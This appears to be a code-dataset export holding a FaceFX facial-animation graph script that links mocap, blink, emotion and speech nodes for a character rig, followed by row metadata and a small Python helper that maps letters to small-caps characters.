graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Down_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Down_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Down_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Down_L" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "sadness_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "sadness_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "fear_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "fear_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "anger_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "anger_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "disgust_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "disgust_eye_l" -linkfn "corrective";
graph -unlink -from "Anger" -to "Blink";
graph -unlink -from "happy" -to "Blink";
graph -unlink -from "disgust_eye_r" -to "Blink";
# Cleanup after previous batch
graph -removenode -name "fear_eyes_depressor";
graph -removenode -name "suprise_eyes_supressor";
#Added control for mocap blinks over other mocap eye nodes
graph -addnode -nodetype "FxCombinerNode" -name "eye_l_movement_depressor" -nodex 10902 -nodey -5560;
graph -addnode -nodetype "FxCombinerNode" -name "eye_r_movement_depressor" -nodex 10040 -nodey -5093;
setName -facegraphnode -old "mocap_eye_depressor" -new "mocap_eye_l_depressor";
graph -addnode -nodetype "FxCombinerNode" -name "mocap_eye_r_depressor" -nodex -2874 -nodey 5000;
graph -unlink -from "Blink" -to "Eye_Up_R";
graph -unlink -from "Blink" -to "Eye_Up_L";
graph -unlink -from "Blink" -to "Eye_Down_L";
graph -unlink -from "Blink" -to "Eye_In_L";
graph -unlink -from "Blink" -to "Eye_Out_L";
graph -unlink -from "Blink" -to "Eye_Out_R";
graph -unlink -from "Blink" -to "Eye_In_R";
graph -unlink -from "Blink" -to "Eye_Down_R";
graph -unlink -from "mocap_eye_l_depressor" -to "Eye_Squint_Down_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eye_Squint_Up_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eyes_widen_Down_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eyes_widen_Up_L";
graph -link -from "eye_l_movement_depressor" -to "Eye_Up_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_Down_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_In_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_Out_L" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Out_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_In_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Down_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eyes_widen_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eyes_widen_Down_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eye_Squint_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eye_Squint_Down_L" -linkfn "corrective";
graph -link -from "Blink" -to "mocap_eye_r_depressor" -linkfn "linear";
graph -link -from "Blink_L" -to "mocap_eye_l_depressor" -linkfn "linear";
graph -link -from "Blink_R" -to "mocap_eye_r_depressor" -linkfn "linear";
graph -link -from "Blink_L" -to "eye_l_movement_depressor" -linkfn "linear";
graph -link -from "Blink_R" -to "eye_r_movement_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_l_movement_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_r_movement_depressor" -linkfn "linear";
# Correct eye in extreme interest
graph -link -from "Eye_Out_R" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eyeball_R_Out" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eye_Out_L" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eyeball_L_Out" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
# Replaced eye correction on self depression
graph -unlink -from "Eye_Out_R" -to "Eye_In_L";
graph -unlink -from "Eyeball_R_Out" -to "Eyeball_L_In";
graph -unlink -from "Eye_Out_L" -to "Eye_In_R";
graph -unlink -from "Eyeball_L_Out" -to "Eyeball_R_In";
graph -addnode -nodetype "FxCombinerNode" -name "eye_in_depressor" -nodex -7476 -nodey 4909;
graph -addnode -nodetype "FxCombinerNode" -name "eye_in_constant_depressor" -nodex -7623 -nodey 5000;
graph -link -from "eye_in_constant_depressor" -to "eye_in_depressor" -linkfn "linear";
graph -editlink -from "eye_in_constant_depressor" -to "eye_in_depressor" -linkfn "linear" -linkfnparams "m=-1|b=1";
graph -link -from "eye_in_depressor" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
#Increased correction value for inner eyes for test purposes
graph -editlink -from "eye_in_depressor" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
# Added mocap depressor while facefx phrases playing
graph -addnode -nodetype "FxCombinerNode" -name "facefx_to_mocap_depressor" -nodex -3643 -nodey 5833;
graph -addnode -nodetype "FxCombinerNode" -name "mocap_low_face_depressor" -nodex -3730 -nodey 5747;
graph -link -from "facefx_to_mocap_depressor" -to "mocap_eye_r_depressor" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_eye_l_depressor" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_low_face_depressor" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "mocap_low_face_depressor" -to "Mouth_swing_right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Mouth_swing_left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Corner_depress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Corner_depress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lips_Purse" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lips_funneler" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Forwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Backwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Flare_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Flare_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Compress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nose_Down_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nose_Down_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Chin_Upwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheeks_Blow_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheeks_Blow_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheek_Raiser_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheek_Raiser_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Forwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Backwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Compress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Wide" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Up" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Rolled_Up" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Rolled_Down" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Pressed_Upwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Narrow" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_In" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Down" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Pinch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Pinch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Open_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Open_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Up_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Up_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Down_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Down_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Pinch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Pinch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Open_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Open_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Upper_Up_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Upper_Up_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipLowerDown_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipLowerDown_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthPress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthPress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthFrown_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthFrown_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthDimple_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthDimple_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperUp_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperUp_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperClose" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsStretch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsStretch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsLowerClose" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
# Added suppression of faceshift animation while playing facefx phrases
graph -addnode -nodetype "FxCombinerNode" -name "mocap_emotions_depressor" -nodex 9507 -nodey 9163;
graph -link -from "mocap_emotions_depressor" -to "smile_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happiness_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happinessP_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happinessP_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happiness_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "phoneme_P_delta_elements" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_emotions_depressor" -linkfn "linear";
graph -link -from "Wonder" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Smile" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Anger" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Fear" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Wide_Smile" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Sadness" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Disgust" -to "mocap_emotions_depressor" -linkfn "corrective";
# Suppresses mocap eye blink while playing facefx phrases
graph -addnode -nodetype "FxCombinerNode" -name "mocap_blink_suppressor" -nodex 10179 -nodey -5836;
graph -link -from "mocap_blink_suppressor" -to "Blink_L" -linkfn "corrective";
graph -link -from "mocap_blink_suppressor" -to "Blink_R" -linkfn "corrective";
graph -link -from "Blink" -to "mocap_blink_suppressor" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_blink_suppressor" -linkfn "linear";
# Restores delta P while playing lipsync
graph -addnode -nodetype "FxCombinerNode" -name "phoneme_P_delta_facefx_call" -nodex 11907 -nodey -1499;
graph -link -from "phoneme_P_delta_facefx_call" -to "phoneme_P_delta_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "phoneme_P_delta_facefx_call" -linkfn "linear";
graph -unlink -from "mocap_emotions_depressor" -to "phoneme_P_delta_elements";
graph -editlink -from "phoneme_P_delta" -to "phoneme_P_delta_elements" -linkfn "linear" -linkfnparams "m=1.0|b=0.000000";
graph -link -from "P" -to "phoneme_P_delta_facefx_call" -linkfn "corrective";
# Not batched
# Reduce Y phoneme for Anna-like setup (women)
graph -editlink -from "phoneme_Y" -to "phoneme_Y_up_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y" -to "phoneme_Y_down_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y_delta" -to "phoneme_Y_delta_up_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y_delta" -to "phoneme_Y_delta_down_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
# restores tongue movement
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Down";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_In";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Narrow";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Pressed_Upwards";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Rolled_Down";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Rolled_Up";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Up";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Wide";
# Connects Strees as low lip down trigger
graph -unlink -from "Stress" -to "Stress_inv";
graph -unlink -from "Rate of Speech Scale_inv" -to "low_lip_down_call";
graph -link -from "Stress" -to "low_lip_down" -linkfn "linear";
graph -link -from "Rate of Speech Scale_inv" -to "Stress" -linkfn "corrective";
# Added suppress for low lip down if mouth openes wide
graph -link -from "jaw_open_general" -to "low_lip_down" -linkfn "corrective";
# Removed node that triggered low lip down somehow
graph -removenode -name "low_lip_down_call";
# Added speech amplifier for shout
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_upper" -nodex 9052 -nodey -10703 -inputop "Multiply Inputs" -max 2.000000;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_depressor" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_low" -nodex 9052 -nodey -10703 -inputop "Multiply Inputs";
graph -addnode -nodetype "FxCombinerNode" -name "wide_pose" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "jaw_amplifier" -nodex 9052 -nodey -10703 -max 2.000000;
graph -addnode -nodetype "FxCombinerNode" -name "amplifier_inverted" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "stress_amplifier" -nodex 9052 -nodey -10703;
// speech_amplifier_upper
// out
graph -link -from "speech_amplifier_upper" -to "anger_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "anger_eye_r_elements" -linkfn "linear" -linkfnparams "m=0.25|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "anger_eye_l_elements" -linkfn "linear" -linkfnparams "m=0.25|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "speech_amplifier_depressor" -linkfn "corrective";
// in
graph -link -from "Stress" -to "speech_amplifier_upper" -linkfn "linear";
graph -link -from "eye_emotions_depressor" -to "speech_amplifier_upper" -linkfn "corrective";
graph -link -from "speech_amplifier" -to "speech_amplifier_upper" -linkfn "linear";
// speech_amplifier_low
// out
graph -link -from "speech_amplifier_low" -to "anger_lip_L_down" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "speech_amplifier_low" -to "anger_lip_R_down" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "speech_amplifier_low" -to "wide_pose" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "speech_amplifier_low" -to "Nose_Up_L" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "Nose_Up_R" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "disgust_lip_L_up" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "disgust_lip_R_up" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
// in
graph -link -from "Stress" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "speech_amplifier" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "P" -to "speech_amplifier_low" -linkfn "corrective";
graph -link -from "U" -to "speech_amplifier_low" -linkfn "corrective" -linkfnparams "Correction Factor=0.5"
// wide_pose
// out
graph -link -from "wide_pose" -to "wide_pose_nose_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_nose_L" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_R_up" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_R_down" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_L_up" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_L_down" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_jaw_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_jaw_L" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_cheek_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_cheek_L" -linkfn "linear";
// in
graph -link -from "stress_amplifier" -to "wide_pose" -linkfn "linear";
graph -link -from "P" -to "wide_pose" -linkfn "corrective";
graph -link -from "speech_amplifier_low" -to "wide_pose" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
// jaw_amplifier
// out
graph -link -from "jaw_amplifier" -to "jaw_open_general" -linkfn "linear";
graph -link -from "jaw_amplifier" -to "up_lip_up" -linkfn "linear";
// in
graph -link -from "amplifier_inverted" -to "jaw_amplifier" -linkfn "linear" -linkfnparams "m=-1|b=1";
// speech_amplifier
// out
graph -link -from "speech_amplifier" -to "stress_amplifier" -linkfn "corrective";
graph -link -from "speech_amplifier" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "speech_amplifier" -to "speech_amplifier_upper" -linkfn "linear";
// stress_amplifier
// out
graph -link -from "stress_amplifier" -to "wide_pose" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Open_L" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Open_R" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Pinch_L" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Pinch_R" -linkfn "linear";
graph -link -from "stress_amplifier" -to "up_lip_up" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "stress_amplifier" -to "anger_lip_L_up" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "stress_amplifier" -to "anger_lip_R_up" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "stress_amplifier" -to "Nose_Up_L" -linkfn "linear" -linkfnparams "m=0.2|b=0.000000";
graph -link -from "stress_amplifier" -to "Nose_Up_R" -linkfn "linear" -linkfnparams "m=0.2|b=0.000000";
// in
graph -link -from "Stress" -to "stress_amplifier" -linkfn "linear";
graph -link -from "speech_amplifier" -to "stress_amplifier" -linkfn "corrective";
// speech_amplifier_depressor
// out
graph -link -from "speech_amplifier_depressor" -to "anger_up_elements" -linkfn "corrective";
graph -link -from "speech_amplifier_depressor" -to "anger_eye_l_elements" -linkfn "corrective";
graph -link -from "speech_amplifier_depressor" -to "anger_eye_r_elements" -linkfn "corrective";
// in
graph -link -from "speech_amplifier_upper" -to "speech_amplifier_depressor" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "speech_amplifier_depressor" -linkfn "linear";
// unlink
graph -unlink -from "mocap_emotions_depressor" -to "anger_up_elements";
graph -unlink -from "mocap_emotions_depressor" -to "anger_eye_r_elements";
graph -unlink -from "mocap_emotions_depressor" -to "anger_eye_l_elements";
# Restores wonder brows, decreses eyes open
graph -editlink -from "surprise_up_suppressor" -to "surprise_up" -linkfn "corrective" -linkfnparams "Correction Factor=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_r" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_l" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
'''
| 66.428295
| 146
| 0.73224
| 4,853
| 34,277
| 4.909128
| 0.071502
| 0.080465
| 0.116227
| 0.079332
| 0.840455
| 0.811954
| 0.78358
| 0.738121
| 0.706682
| 0.666093
| 0
| 0.024135
| 0.139335
| 34,277
| 515
| 147
| 66.557282
| 0.783431
| 0.008811
| 0
| 0.071429
| 0
| 0.030612
| 0.219767
| 0.050996
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.05102
| null | null | 0.081633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc0a9d8cde4f6ed505ccb1d0e6065118198b8e88
| 26,139
|
py
|
Python
|
userbot/helpers/fonts.py
|
Doom098/userbot
|
11f0225a75241ab9492b1c435414c77de287b8a6
|
[
"MIT"
] | 25
|
2021-06-01T04:59:13.000Z
|
2022-03-01T05:31:13.000Z
|
userbot/helpers/fonts.py
|
Doom098/userbot
|
11f0225a75241ab9492b1c435414c77de287b8a6
|
[
"MIT"
] | 15
|
2019-11-07T07:53:56.000Z
|
2022-01-23T09:21:17.000Z
|
userbot/helpers/fonts.py
|
Doom098/userbot
|
11f0225a75241ab9492b1c435414c77de287b8a6
|
[
"MIT"
] | 78
|
2020-12-13T17:52:51.000Z
|
2022-03-24T03:43:09.000Z
|
normaltext = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
smallcapsfont = "ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
